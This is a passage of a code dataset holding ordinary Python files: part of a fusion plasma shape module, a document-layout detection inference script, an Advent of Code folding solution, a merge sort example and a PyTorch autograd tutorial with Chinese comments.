else:\n params = None\n\n ip = references[\"Ip\", 0]\n return cls(\n params,\n points=trim_zero_points(points_from_references(references, \"shape1\")),\n x_points=trim_zero_points(points_from_references(references,\n \"x_points\")),\n legs=trim_zero_points(points_from_references(references, \"legs\")),\n limit_point=trim_zero_points(points_from_references(\n references, 
\"limit_point\")[0:1]),\n diverted=Diverted.from_refs(references),\n ip=float(ip) if ip != 0 else None)\n\n def gen_references(self) -> named_array.NamedArray:\n \"\"\"Return the references for the parametrized shape.\"\"\"\n refs = tcv_common.REF_RANGES.new_named_array()\n\n if self.ip is not None:\n refs[\"Ip\", 0] = self.ip\n\n refs[\"diverted\", 0] = 1 if self.diverted == Diverted.DIVERTED else 0\n refs[\"limited\", 0] = 1 if self.diverted == Diverted.LIMITED else 0\n\n if self.params is not None:\n refs[\"R\", 0] = self.params.r0\n refs[\"Z\", 0] = self.params.z0\n refs[\"kappa\", 0] = self.params.kappa\n refs[\"delta\", 0] = self.params.delta\n refs[\"radius\", 0] = self.params.radius\n refs[\"lambda\", 0] = self.params.lambda_\n\n if self.points is not None:\n points = np.array(self.points)\n assert refs.names.count(\"shape_r\") >= points.shape[0]\n refs[\"shape_r\", :points.shape[0]] = points[:, 0]\n refs[\"shape_z\", :points.shape[0]] = points[:, 1]\n\n if self.x_points is not None:\n x_points = np.array(self.x_points)\n assert refs.names.count(\"x_points_r\") >= x_points.shape[0]\n refs[\"x_points_r\", :x_points.shape[0]] = x_points[:, 0]\n refs[\"x_points_z\", :x_points.shape[0]] = x_points[:, 1]\n\n if self.legs is not None:\n legs = np.array(self.legs)\n assert refs.names.count(\"legs_r\") >= legs.shape[0]\n refs[\"legs_r\", :legs.shape[0]] = legs[:, 0]\n refs[\"legs_z\", :legs.shape[0]] = legs[:, 1]\n\n if self.limit_point is not None:\n refs[\"limit_point_r\", 0] = self.limit_point.r\n refs[\"limit_point_z\", 0] = self.limit_point.z\n\n return refs\n\n def canonical(self) -> \"Shape\":\n \"\"\"Return a canonical shape with a fixed number of points and params.\"\"\"\n num_points = tcv_common.REF_RANGES.count(\"shape_r\")\n out = copy.deepcopy(self)\n\n if out.points is None:\n if out.params is None:\n raise ValueError(\"Can't canonicalize with no params or points.\")\n out.points, center = out.params.gen_points(num_points)\n out.params.r0 = center.r\n out.params.z0 = center.z\n out.params.side = ShapeSide.NOSHIFT\n else:\n out.points = spline_interpolate_points(\n out.points, num_points, out.x_points or [])\n if out.params:\n out.params.side = ShapeSide.NOSHIFT\n else:\n # Copied from FGE. 
# Details: https://doi.org/10.1017/S0022377815001270\n        top = max(out.points, key=lambda p: p.z)\n        left = min(out.points, key=lambda p: p.r)\n        right = max(out.points, key=lambda p: p.r)\n        bottom = min(out.points, key=lambda p: p.z)\n        center = Point((left.r + right.r) / 2,\n                       (top.z + bottom.z) / 2)\n\n        radius = (right.r - left.r) / 2\n        kappa = (top.z - bottom.z) / (right.r - left.r)\n        delta_lower = (center.r - bottom.r) / radius  # lower triangularity\n        delta_upper = (center.r - top.r) / radius  # upper triangularity\n        delta = (delta_lower + delta_upper) / 2\n\n        out.params = ParametrizedShape(\n            r0=center.r, z0=center.z, radius=radius, kappa=kappa, delta=delta,\n            lambda_=0, side=ShapeSide.NOSHIFT)\n\n    return out\n\n\ndef points_from_references(\n    references: named_array.NamedArray, key: str = \"shape1\",\n    num: Optional[int] = None) -> ShapePoints:\n  points = np.array([references[f\"{key}_r\"], references[f\"{key}_z\"]]).T\n  if num is not None:\n    points = points[:num]\n  return to_shape_points(points)\n\n\n@dataclasses.dataclass\nclass ReferenceTimeSlice:\n  shape: Shape\n  time: float\n  hold: Optional[float] = None  # Absolute time.\n\n  def __post_init__(self):\n    if self.hold is None:\n      self.hold = self.time\n\n\ndef canonicalize_reference_series(\n    time_slices: List[ReferenceTimeSlice]) -> List[ReferenceTimeSlice]:\n  \"\"\"Canonicalize a full sequence of time slices.\"\"\"\n  outputs = []\n  for ref in time_slices:\n    ref_shape = ref.shape.canonical()\n\n    prev = outputs[-1] if outputs else None\n    if prev is not None and prev.hold + tcv_common.DT < ref.time:\n      leg_diff = len(ref_shape.legs or []) != len(prev.shape.legs or [])\n      xp_diff = len(ref_shape.x_points or []) != len(prev.shape.x_points or [])\n      div_diff = ref_shape.diverted != prev.shape.diverted\n      limit_diff = (\n          bool(ref_shape.limit_point and ref_shape.limit_point.r > 0) !=\n          bool(prev.shape.limit_point and prev.shape.limit_point.r > 0))\n      if leg_diff or xp_diff or div_diff or limit_diff:\n        # Try not to interpolate between a real x-point and a non-existent\n        # x-point. Non-existent x-points are represented as being at the\n        # origin, i.e. 
out to the left of the vessel, and could be interpolated\n # into place, but that's weird, so better to pop it into existence by\n # adding an extra frame one before with the new shape targets.\n # This doesn't handle the case of multiple points appearing/disappearing\n # out of order, or of one moving while the other disappears.\n outputs.append(\n ReferenceTimeSlice(\n time=ref.time - tcv_common.DT,\n shape=Shape(\n ip=ref_shape.ip,\n params=ref_shape.params,\n points=ref_shape.points,\n x_points=(prev.shape.x_points\n if xp_diff else ref_shape.x_points),\n legs=(prev.shape.legs if leg_diff else ref_shape.legs),\n limit_point=(prev.shape.limit_point\n if limit_diff else ref_shape.limit_point),\n diverted=(prev.shape.diverted\n if div_diff else ref_shape.diverted))))\n\n outputs.append(ReferenceTimeSlice(ref_shape, ref.time, ref.hold))\n\n return outputs\n","repo_name":"deepmind/deepmind-research","sub_path":"fusion_tcv/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":16993,"program_lang":"python","lang":"en","doc_type":"code","stars":11900,"dataset":"github-code","pt":"37"} +{"seq_id":"29419769617","text":"import argparse\n\nimport cv2\n\nfrom ditod import add_vit_config\n\nimport torch\n\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import ColorMode, Visualizer\nfrom detectron2.data import MetadataCatalog\nfrom ditod.VGTTrainer import DefaultPredictor\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Detectron2 inference script\")\n parser.add_argument(\n \"--image_root\",\n help=\"Path to input image\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--grid_root\",\n help=\"Path to input image\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--image_name\",\n help=\"Path to input image\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--output_root\",\n help=\"Name of the output visualization file.\",\n type=str,\n )\n parser.add_argument(\n \"--dataset\",\n help=\"Path to input image\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--config-file\",\n default=\"configs/quick_schedules/mask_rcnn_R_50_FPN_inference_acc_test.yaml\",\n metavar=\"FILE\",\n help=\"path to config file\",\n )\n parser.add_argument(\n \"--opts\",\n help=\"Modify config options using the command-line 'KEY VALUE' pairs\",\n default=[],\n nargs=argparse.REMAINDER,\n )\n\n args = parser.parse_args()\n \n if args.dataset in ('D4LA', 'doclaynet'):\n image_path = args.image_root + args.image_name + \".png\"\n else:\n image_path = args.image_root + args.image_name + \".jpg\"\n \n if args.dataset == 'publaynet':\n grid_path = args.grid_root + args.image_name + \".pdf.pkl\"\n elif args.dataset == 'docbank':\n grid_path = args.grid_root + args.image_name + \".pkl\"\n elif args.dataset == 'D4LA':\n grid_path = args.grid_root + args.image_name + \".pkl\"\n elif args.dataset == 'doclaynet':\n grid_path = args.grid_root + args.image_name + \".pdf.pkl\"\n \n output_file_name = args.output_root + args.image_name + \".jpg\"\n \n # Step 1: instantiate config\n cfg = get_cfg()\n add_vit_config(cfg)\n cfg.merge_from_file(args.config_file)\n \n # Step 2: add model weights URL to config\n cfg.merge_from_list(args.opts)\n \n # Step 3: set device\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n cfg.MODEL.DEVICE = device\n\n # Step 4: define model\n predictor = DefaultPredictor(cfg)\n \n # Step 5: run inference\n img = cv2.imread(image_path)\n \n md = MetadataCatalog.get(cfg.DATASETS.TEST[0])\n if 
args.dataset == 'publaynet':\n        md.set(thing_classes=[\"text\",\"title\",\"list\",\"table\",\"figure\"])\n    elif args.dataset == 'docbank':\n        md.set(thing_classes=[\"abstract\",\"author\",\"caption\",\"date\",\"equation\", \"figure\", \"footer\", \"list\", \"paragraph\", \"reference\", \"section\", \"table\", \"title\"])\n    elif args.dataset == 'D4LA':\n        md.set(thing_classes=[\"DocTitle\",\"ParaTitle\",\"ParaText\",\"ListText\",\"RegionTitle\", \"Date\", \"LetterHead\", \"LetterDear\", \"LetterSign\", \"Question\", \"OtherText\", \"RegionKV\", \"Regionlist\", \"Abstract\", \"Author\", \"TableName\", \"Table\", \"Figure\", \"FigureName\", \"Equation\", \"Reference\", \"Footnote\", \"PageHeader\", \"PageFooter\", \"Number\", \"Catalog\", \"PageNumber\"])\n    elif args.dataset == 'doclaynet':\n        md.set(thing_classes=[\"Caption\",\"Footnote\",\"Formula\",\"List-item\",\"Page-footer\", \"Page-header\", \"Picture\", \"Section-header\", \"Table\", \"Text\", \"Title\"])\n\n    output = predictor(img, grid_path)[\"instances\"]\n    \n    # import ipdb;ipdb.set_trace()\n    v = Visualizer(img[:, :, ::-1],\n                   md,\n                   scale=1.0,\n                   instance_mode=ColorMode.SEGMENTATION)\n    result = v.draw_instance_predictions(output.to(\"cpu\"))\n    result_image = result.get_image()[:, :, ::-1]\n\n    # Step 6: save\n    cv2.imwrite(output_file_name, result_image)\n\nif __name__ == '__main__':\n    main()\n\n","repo_name":"AlibabaResearch/AdvancedLiterateMachinery","sub_path":"DocumentUnderstanding/VGT/object_detection/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","stars":379,"dataset":"github-code","pt":"37"}
{"seq_id":"25136194781","text":"import aocd\nimport sys\n\nfrom collections import defaultdict\nfrom functools import reduce\n\n# Eager evaluation makes this easier\nlmap = lambda x, y: list(map(x, y))\nlfilter = lambda x, y: list(filter(x, y))\n\n\ndef get_input():\n    if len(sys.argv) == 1:\n        return aocd.get_data(day=13).split(\"\\n\")\n    else:\n        with open(\"input\", \"r\") as filey:\n            return lmap(lambda x: x.strip(), filey)\n\n\ndef transformed_input():\n    nums = []\n    directions = []\n    for line in get_input():\n        if len(line) == 0:\n            continue\n        elif line[0] != 'f':\n            nums.append(line)\n        else:\n            directions.append(line)\n    new_directions = []\n    for direction in directions:\n        yx, num = direction.split(\"=\")\n        yx = 'y' if yx.endswith('y') else 'x'\n        new_directions.append((yx, int(num)))\n\n    return lmap(lambda x: (int(x[1]), int(x[0])), map(lambda x: x.split(\",\"),\n                                                      nums)), new_directions\n\n\nget_maxi = lambda spots: max(map(lambda x: x[0], spots))\nget_maxj = lambda spots: max(map(lambda x: x[1], spots))\n\n\ndef sg(matrix, i, j):\n    if len(matrix) > i and len(matrix[0]) > j:\n        return matrix[i][j]\n    return 0\n\n\ndef merge_top(top, bottom):\n    maxi = max(len(top), len(bottom))\n    maxj = max(len(top[0]), len(bottom[0]))\n    matrix_top = [[sg(top, i, j) for j in range(maxj)] for i in range(maxi)]\n    return [[sg(bottom, maxi - i - 1, j) | matrix_top[i][j]\n             for j in range(maxj)]\n            for i in range(maxi)]\n\n\ndef fold_top(matrix, rows):\n    top = matrix[:rows][:]\n    bottom = matrix[rows + 1:][:]\n    return merge_top(top, bottom)\n\n\ndef fold_left(matrix, columns):\n    # Mirror image of fold_top: flip the right half horizontally and OR it\n    # onto the left half, reusing the same padding convention as merge_top.\n    left = [matrix[i][:columns][:] for i in range(len(matrix))]\n    right = [matrix[i][columns + 1:][:] for i in range(len(matrix))]\n    maxi = max(len(left), len(right))\n    maxj = max(len(left[0]), len(right[0]))\n    matrix_left = [[sg(left, i, j) for j in range(maxj)] for i in range(maxi)]\n    return [[sg(right, i, maxj - j - 1) | matrix_left[i][j]\n             for j in range(maxj)]\n            for i in range(maxi)]\n\n\ndef pretty_print(matrix):\n    for row in matrix:\n        for column in row:\n            print('#' if column == 1 else '.', end=\"\")\n        
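        # row finished: the bare print() below emits the newline that end=\"\" suppressed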
print()\n print()\n\n\ndef solution():\n spots, directions = transformed_input()\n print(\"Spots\", spots)\n print(\"Directions\", directions)\n maxi = get_maxi(spots) + 1\n maxj = get_maxj(spots) + 1\n s = set(spots)\n matrix = [[1 if (i, j) in s else 0 for j in range(maxj)] for i in range(maxi)]\n pretty_print(matrix)\n for (xy, line) in directions:\n if xy == 'x':\n matrix = fold_left(matrix, line)\n else:\n matrix = fold_top(matrix, line)\n pretty_print(matrix)\n return sum(map(sum, matrix))\n\n\nif __name__ == \"__main__\":\n print(solution())\n","repo_name":"justinba1010/aoc2021","sub_path":"2021/d13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3562873696","text":"def mergeSort(alist):\n if len(alist) <= 1:\n return alist\n mid = len(alist) // 2\n\n left = mergeSort(alist[:mid])\n right = mergeSort(alist[mid:])\n print('left:', left)\n print('right:', right)\n return merge(left, right)\n\n\ndef merge(left, right):\n result = []\n i, j = 0, 0\n while i < len(left) and j < len(right): # 两个指针同步移动\n if left[i] <= right[j]:\n result.append(left[i])\n i = i + 1\n else:\n result.append(right[j])\n j = j + 1\n # 下面两条语句中,只有一个会执行\n result += left[i:] # 若第一个表未检测完,添加到result后面\n result += right[j:] # 若第二个表未检测完,添加到result后面\n return result\n\n\nseq = [5, 3, 0, 6, 1, 4]\nprint('排序前:', seq)\nresult = mergeSort(seq)\nprint('排序后:', result)","repo_name":"xiaokongkong/some-tricks-about-python","sub_path":"刷题/排序/归并排序.py","file_name":"归并排序.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26366506566","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"\ndetach(), torch.no_grad() 和 model.eval() 的区别和联系:\n\n\ndetach() 和 torch.no_grad() 都可以实现相同的效果,只是前者会麻烦一点,对每一个变量都要加上,而后者就不用管了:\n - detach() 会返回一个新的Tensor对象,不会在反向传播中出现,是相当于复制了一个变量,将它原本requires_grad=True变为了requires_grad=False\n - torch.no_grad() 通常是在推断(inference)的时候,用来禁止梯度计算,仅进行前向传播。在训练过程中,就像画了个圈,来,在我这个圈里面跑一下,都不需要计算梯度,就正向传播一下。\n\n\n而model.eval()和torch.no_grad()两者都用,因为两者有着不同的作用:\n - torch.no_grad():在autograd中禁用梯度跟踪\n - model.eval():更改所调用模块的forward()行为。例如,它禁用dropout,并使用测试时bn norm\n\nmodel.eval()\n 使用model.eval()切换到测试模式,不会更新模型的k,b参数\n 通知dropout层和batchnorm层在train和val中间进行切换\n 在train模式,dropout层会按照设定的参数p设置保留激活单元的概率(保留概率=p,比如keep_prob=0.8),batchnorm层会继续计算数据的mean和var并进行更新\n 在val模式下,dropout层会让所有的激活单元都通过,而batchnorm层会停止计算和更新mean和var,直接使用在训练阶段已经学出的mean和var值\n model.eval()不会影响各层的gradient计算行为,即gradient计算和存储与training模式一样,只是不进行反向传播(backprobagation)\n\n\nmodel.eval()与torch.no_grad()可以同时用,更加节省cpu的算力\n\n\"\"\"\n\nfrom __future__ import print_function\nimport torch\nimport numpy as np\n\n\n\n#=============================================================================\n# Autograd: 自动求导机制\n#=============================================================================\n\n# requires_grad: 如果需要为张量计算梯度,则为True,否则为False。我们使用pytorch创建tensor时,可以指定requires_grad为True(默认为False),\n\n# grad_fn: grad_fn用来记录变量是怎么来的,方便计算梯度,y = x*3,grad_fn记录了y由x计算的过程。\n\n# grad:当执行完了backward()之后,通过x.grad查看x的梯度值。\n\n# 像x这种直接创建的称为叶子节点,叶子节点对应的grad_fn是None。\n\n# 如果一个张量地requires_grad=True,那么在调用backward()方法时反向传播计算梯度,我们\n# 会为这个张量计算梯度,但是计算完梯度之后这个梯度并不一定会一直保存在属性grad中.只有对于\n# requires_grad=True的叶子张量,我们才会将梯度一直保存在该叶子张量的grad属性中,对于非叶子节点,\n# 即中间节点的张量,我们在计算完梯度之后为了更高效地利用内存,我们会将梯度grad的内存释放掉.)\n\n#----------------------------------------------- requires_grad 
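# A minimal runnable sketch of the leaf vs. non-leaf note above: after backward(),\n# .grad is kept only for leaf tensors with requires_grad=True; an intermediate\n# (non-leaf) tensor must opt in via retain_grad().\nimport torch\n\nx = torch.tensor([2.0], requires_grad=True)  # leaf tensor\ny = x * 3                                    # intermediate (non-leaf) tensor\ny.retain_grad()                              # ask autograd to keep y.grad\nz = (y ** 2).sum()\nz.backward()\nprint(x.grad)  # tensor([36.]) : dz/dx = 2*(3x)*3 = 18x\nprint(y.grad)  # tensor([12.]) : dz/dy = 2y, kept because of retain_grad()\n\n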
----------------------------------------------\n# 测试一些什么都不做,查看计算的梯度\nimport torch\n\nx = torch.tensor([1.0, 2.0])\ny1 = x ** 2\ny2 = y1 * 2\ny3 = y1 + y2\n\nprint(y1, y1.requires_grad)\nprint(y2, y2.requires_grad)\nprint(y3, y3.requires_grad)\n\n# 为什么backward里面需要加一个torch.ones(y3.shape)?\n# 这是另外一个需要讨论的问题了可以在留言区一起讨论\ny3.backward(torch.ones(y3.shape)) # y1.backward() y2.backward()\nprint(x.grad)\n\n# tensor([1., 4.]) False\n# tensor([2., 8.]) False\n# tensor([ 3., 12.]) False\n\n# RuntimeError: element 0 of tensors does not require grad and does not have a grad_fn\n\n\n#----------------------------------------------- 分割线 ----------------------------------------------\n# 测试一些什么都不做,查看计算的梯度\nimport torch\n\nx = torch.tensor([1.0, 2.0], requires_grad=True)\ny1 = x ** 2\ny2 = y1 * 2\ny3 = y1 + y2\n\nprint(y1, y1.requires_grad)\nprint(y2, y2.requires_grad)\nprint(y3, y3.requires_grad)\n\ny3.backward(torch.ones(y3.shape)) # y1.backward() y2.backward()\nprint(x.grad)\n\n# tensor([1., 4.], grad_fn=) True\n# tensor([2., 8.], grad_fn=) True\n# tensor([ 3., 12.], grad_fn=) True\n# tensor([ 6., 12.])\n\n\"\"\"\n1. 当grad_fn设置为Fasle或者默认时:计算梯度会出现如下错误\nRuntimeError: element 0 of tensors does not require grad and does not have a grad_fn\n因为并没有追踪到任何计算历史,所以就不存在梯度的计算了\n\n2. 因此在最开始定义x张量的时候,就应当设置好是否计算追踪历史计算记录\n\"\"\"\n\n\n#----------------------------------------------- detach(): ----------------------------------------------\n# 设置好requires_grad的值为True\nimport torch\n\nx = torch.tensor([1.0, 2.0], requires_grad=True)\ny1 = x ** 2\ny2 = y1.detach() * 2 # 注意这里在计算y2的时候对y1进行了detach()\ny3 = y1 + y2\n\nprint(y1, y1.requires_grad)\nprint(y2, y2.requires_grad)\nprint(y3, y3.requires_grad)\n\n\ny3.backward(torch.ones(y3.shape)) # y1.backward() y2.backward()\nprint(x.grad)\n\n# tensor([1., 4.], grad_fn=) True\n# tensor([2., 8.]) False\n# tensor([ 3., 12.], grad_fn=) True\n# tensor([2., 4.])\n\n\n#----------------------------------------------- detach(): ----------------------------------------------\n# 当使用detach()分离tensor但是没有更改这个tensor时,并不会影响backward():\n\nimport torch\n\na = torch.tensor([1, 2, 3.], requires_grad=True)\nprint(a.grad)\nout = a.sigmoid()\nprint(out)\n\n#添加detach(),c的requires_grad为False\nc = out.detach()\nprint(c)\nprint(out.grad)\nprint(c.grad)\n\n#这时候没有对c进行更改,所以并不会影响backward()\nout.sum().backward()\nprint(a.grad)\n\n'''返回:\nNone\ntensor([0.7311, 0.8808, 0.9526], grad_fn=)\ntensor([0.7311, 0.8808, 0.9526])\ntensor([0.1966, 0.1050, 0.0452])\n'''\n\n\n#----------------------------------------------- detach(): ----------------------------------------------\n# 当使用detach()分离tensor,然后用这个分离出来的tensor去求导数,会影响backward(),会出现错误\nimport torch\n\na = torch.tensor([1, 2, 3.], requires_grad=True)\nprint(a.grad)\nout = a.sigmoid()\nprint(out)\n\n#添加detach(),c的requires_grad为False\nc = out.detach()\nprint(c)\n\n#使用新生成的Variable进行反向传播\nc.sum().backward()\nprint(a.grad)\n\n'''返回:\nNone\ntensor([0.7311, 0.8808, 0.9526], grad_fn=)\ntensor([0.7311, 0.8808, 0.9526])\nTraceback (most recent call last):\n File \"test.py\", line 13, in \n c.sum().backward()\n File \"/anaconda3/envs/deeplearning/lib/python3.6/site-packages/torch/tensor.py\", line 102, in backward\n torch.autograd.backward(self, gradient, retain_graph, create_graph)\n File \"/anaconda3/envs/deeplearning/lib/python3.6/site-packages/torch/autograd/__init__.py\", line 90, in backward\n allow_unreachable=True) # allow_unreachable flag\nRuntimeError: element 0 of tensors does not require grad and does not have a grad_fn\n'''\n\n#----------------------------------------------- 
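# Re: the question above about y3.backward(torch.ones(y3.shape)) -- a non-scalar\n# output needs a seed vector v for the vector-Jacobian product v^T J, so PyTorch\n# rejects a bare y3.backward(); passing all-ones is equivalent to reducing with\n# sum() first. A small sketch:\nimport torch\n\nx = torch.tensor([1.0, 2.0], requires_grad=True)\ny = 3 * x ** 2\ny.sum().backward()  # same gradients as y.backward(torch.ones(y.shape))\nprint(x.grad)       # tensor([ 6., 12.]) : d(3x^2)/dx = 6x\n\n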
detach(): ----------------------------------------------\n# 当使用detach()分离tensor并且更改这个tensor时,即使再对原来的out求导数,会影响backward(),会出现错误\n\n\nimport torch\n\na = torch.tensor([1, 2, 3.], requires_grad=True)\nprint(a.grad)\nout = a.sigmoid()\nprint(out)\n\n#添加detach(),c的requires_grad为False\nc = out.detach()\nprint(c)\nc.zero_() #使用in place函数对其进行修改\n\n#会发现c的修改同时会影响out的值\nprint(c)\nprint(out)\n\n#这时候对c进行更改,所以会影响backward(),这时候就不能进行backward(),会报错\nout.sum().backward()\nprint(a.grad)\n\n'''返回:\nNone\ntensor([0.7311, 0.8808, 0.9526], grad_fn=)\ntensor([0.7311, 0.8808, 0.9526])\ntensor([0., 0., 0.])\ntensor([0., 0., 0.], grad_fn=)\nTraceback (most recent call last):\n File \"test.py\", line 16, in \n out.sum().backward()\n File \"/anaconda3/envs/deeplearning/lib/python3.6/site-packages/torch/tensor.py\", line 102, in backward\n torch.autograd.backward(self, gradient, retain_graph, create_graph)\n File \"/anaconda3/envs/deeplearning/lib/python3.6/site-packages/torch/autograd/__init__.py\", line 90, in backward\n allow_unreachable=True) # allow_unreachable flag\nRuntimeError: one of the variables needed for gradient computation has been modified\nby an inplace operation\n'''\n\n\n\"\"\"\n对比一下使用detach()前后的梯度值tensor([ 6., 12.])和tensor([2., 4.])\n(1)tensor([ 6., 12.])\n\ny3 = y2 + y1,根据 y2 = y1*2, 而y1 = x ** 2\n所以y3 = 3x**2, y3对xi的偏导则为6xi\n针对x = [1, 2]\n所以,对应的梯度(偏导)则为:[6, 12]\n\n(2)tensor([ 2., 4.])\n\ny3 = y2 + y1,因为y2是根据y1.detach()得到的;\n根据��义,所以计算梯度的时候不考虑y2,但是实际计算y3的值还是按原公式\n因此计算梯度时。y3 = y1 + (y2不考虑),所以y3 = x ** 2\ny3对xi的偏导则为2xi\n针对x = [1, 2]\n所以,对应的梯度(偏导)则为:[2, 4]\n\n当我们在计算到某一步时,不需要在记录某一个张量的时,就可以使用detach()将其从追踪记录当中分离出来,这样一来该张量对应计算产生的梯度就不会被考虑了。\n\n\n\"\"\"\n\n#----------------------------------------------- with torch.no_grad() ----------------------------------------------\n# 设置好requires_grad的值为True\nimport torch\n\nx = torch.tensor([1.0, 2.0], requires_grad=True)\ny1 = x ** 2\n\nwith torch.no_grad(): # 这里使用了no_grad()包裹不需要被追踪的计算过程\n y2 = y1 * 2\n\ny3 = y1 + y2\n\nprint(y1, y1.requires_grad)\nprint(y2, y2.requires_grad)\nprint(y3, y3.requires_grad)\n\ny3.backward(torch.ones(y3.shape)) # y1.backward() y2.backward()\nprint(x.grad)\n\n\"\"\"\n可想而知,实际上torch.no_grad()功能和detach()方法作用是一致的。\n有差区别?\ndetach()是考虑将单个张量从追踪记录当中脱离出来;\n而torch.no_grad()是一个warper,可以将多个计算步骤的张量计算脱离出去,本质上没啥区别。\n\"\"\"\n\n\"\"\"\nrequires_grad:在最开始创建Tensor时候可以设置的属性,用于表明是否追踪当前Tensor的计算操作。后面也可以通过requires_grad_()方法设置该参数,但是只有叶子节点才可以设置该参数。\ndetach()方法:则是用于将某一个Tensor从计算图中分离出来。返回的是一个内存共享的Tensor,一变都变。\ntorch.no_grad():对所有包裹的计算操作进行分离。\n但是torch.no_grad()将会使用更少的内存,因为从包裹的开始,就表明不需要计算梯度了,因此就不需要保存中间结果。3\n.data则是以前Pytorch中Variable的一个属性,返回的是一个共享内存的Tensor,一变都变,只是现在很少使用了。\n\"\"\"\n\n\n#----------------------------------------------- 分割线 ----------------------------------------------\nimport torch\n\nx = torch.ones(2, 2, requires_grad=True)\ny = x + 2\nz = y * y * 3\nout = z.mean()\n#x->y->z->out\nprint(f\"x = {x}\\n\")\nprint(f\"y = {y}\\n\")\nprint(f\"z = {z}\\n\")\nprint(f\"out = {out}\\n\")\nprint(f\"out.grad_fn = {out.grad_fn}\\n\")\n\n\"\"\"\nx = tensor([[1., 1.],\n [1., 1.]], requires_grad=True)\n\ny = tensor([[3., 3.],\n [3., 3.]], grad_fn=)\n\nz = tensor([[27., 27.],\n [27., 27.]], grad_fn=)\n\nout = 27.0\n\nout.grad_fn = \n\n\n\n这里,我们可以将x假想成神经网络的输入,y是神经网络的隐藏层,z是神经网络的输出,最后的out是损失函数;或者说我们建立了一个简单的计算图,数据从x流向out。可以看到,只要x设置了requires_grad=True,那么计算图后续的节点用grad_fn记录了计算图中各步的传播过程。\n现在,我们从out开始进行反向传播:\n\"\"\"\n#反向传播 因为 out是一个纯量(scalar),out.backward() 等于out.backward(torch.tensor(1))。\nout.backward(torch.tensor(1))\n\nprint(f\"x.grad = {x.grad}\\n\")\n\n\"\"\"\nx.grad = 
tensor([[9., 9.],\n [9., 9.]])\n\n\n拓展到深度学习,从输入开始,每层都有大量参数W和b,这些参数也是Tensor结构。给Tensor设置了requires_grad=True后,PyTorch会跟踪Tensor之后的所有计算,经过.backward()后,PyTorch自动帮我们计算损失函数对于这些参数的梯度,梯度存储在了.grad属性里,PyTorch会按照梯度下降法更新参数。\n\n在PyTorch中,.backward()方法默认只会对计算图中的叶子节点求导。在上面的例子里,x就是叶子节点,y和z都是中间变量,他们的.grad属性都是None。而且,PyTorch目前只支持浮点数的求导。\n\n另外,PyTorch的自动求导一般只是标量对向量/矩阵求导。在深度学习中,最后的损失函数一般是一个标量值,是样本数据经过前向传播得到的损失值的和,而输入数据是一个向量或矩阵。在刚才的例子中,y是一个矩阵,.mean()对y求导,得到的是标量。\n\"\"\"\n\n\n#----------------------------------------------- 分割线 ----------------------------------------------\n\nimport torch\n\n\nx = torch.ones(2, 2, requires_grad=True)\ny = x + 2\nz = y * y * 3\nout = z.mean()\n#x->y->z->out\nprint(f\"x = {x}\\n\")\nprint(f\"y = {y}\\n\")\nprint(f\"z = {z}\\n\")\nprint(f\"out = {out}\\n\")\nprint(f\"out.grad_fn = {out.grad_fn}\\n\")\n\n\"\"\"\nx = tensor([[1., 1.],\n [1., 1.]], requires_grad=True)\n\ny = tensor([[3., 3.],\n [3., 3.]], grad_fn=)\n\nz = tensor([[27., 27.],\n [27., 27.]], grad_fn=)\n\nout = 27.0\n\nout.grad_fn = \n\"\"\"\n\ngradients = torch.tensor([[0, 1],[2,3]], dtype=torch.float)\n#反向传播 因为 out是一个纯量(scalar),out.backward() 等于out.backward(torch.tensor(1))。\nz.backward(gradients)\n\nprint(f\"x.grad = {x.grad}\\n\")\n# x.grad = tensor([[ 0., 18.],\n# [36., 54.]])\n\n#----------------------------------------------- 分割线 ----------------------------------------------\nimport torch\n\nx = torch.ones(2, 2, requires_grad=True)\ny = x + 2\nz = y * y * 3\nout = z.mean()\n#x->y->z->out\nprint(f\"x = {x}\\n\")\nprint(f\"y = {y}\\n\")\nprint(f\"z = {z}\\n\")\nprint(f\"out = {out}\\n\")\nprint(f\"out.grad_fn = {out.grad_fn}\\n\")\n\n\"\"\"\nx = tensor([[1., 1.],\n [1., 1.]], requires_grad=True)\n\ny = tensor([[3., 3.],\n [3., 3.]], grad_fn=)\n\nz = tensor([[27., 27.],\n [27., 27.]], grad_fn=)\n\nout = 27.0\n\nout.grad_fn = \n\"\"\"\n\ngradients = torch.tensor([[0, 1],[2,3]], dtype=torch.float)\n#反向传播 因为 out是一个纯量(scalar),out.backward() 等于out.backward(torch.tensor(1))。\nout.backward(torch.tensor(2))\n\nprint(f\"x.grad = {x.grad}\\n\")\n\n#----------------------------------------------- 分割线 ----------------------------------------------\nimport torch\na = torch.randn(2, 2)\na = ((a * 3) / (a - 1))\nprint(f\"a.requires_grad = {a.requires_grad}\\n\")\na.requires_grad_(True)\nprint(f\"a.requires_grad = {a.requires_grad}\\n\")\nb = (a * a).sum()\nprint(f\"b.grad_fn = {b.grad_fn}\\n\")\n\n\n\"\"\"\na.requires_grad = False\n\na.requires_grad = True\n\nb.grad_fn = \n\"\"\"\n\n\n\nimport torch\na = torch.randn(2, 2)\na = ((a * 3) / (a - 1))\nprint(f\"a.requires_grad = {a.requires_grad}\\n\")\n\nb = (a * a).sum()\nprint(f\"b.grad_fn = {b.grad_fn}\\n\")\n\n\n\"\"\"\na.requires_grad = False\n\nb.grad_fn = None\n\"\"\"\n\n#----------------------------------------------- 分割线 ----------------------------------------------\n\n\n\n\nimport torch\nx = torch.randn(3, requires_grad=True)\n\ny = x * 2\n\n# data.norm()首先,它对张量y每个元素进行平方,然后对它们求和,最后取平方根。 这些操作计算就是所谓的L2或欧几里德范数 。\nwhile y.data.norm() < 1000:\n y = y * 2\n\nprint(f\"t = {y}\\n\")\n\n\n\"\"\"\n如果需要计算导数,你可以在Tensor上调用.backward()。 